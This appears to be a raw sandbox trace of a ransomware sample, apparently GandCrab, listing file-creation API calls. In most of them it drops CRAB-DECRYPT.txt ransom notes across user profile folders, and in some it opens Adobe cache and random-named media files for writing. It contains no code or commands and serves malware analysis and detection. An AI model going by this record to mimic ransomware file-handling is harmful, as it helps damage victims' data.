Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\My Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
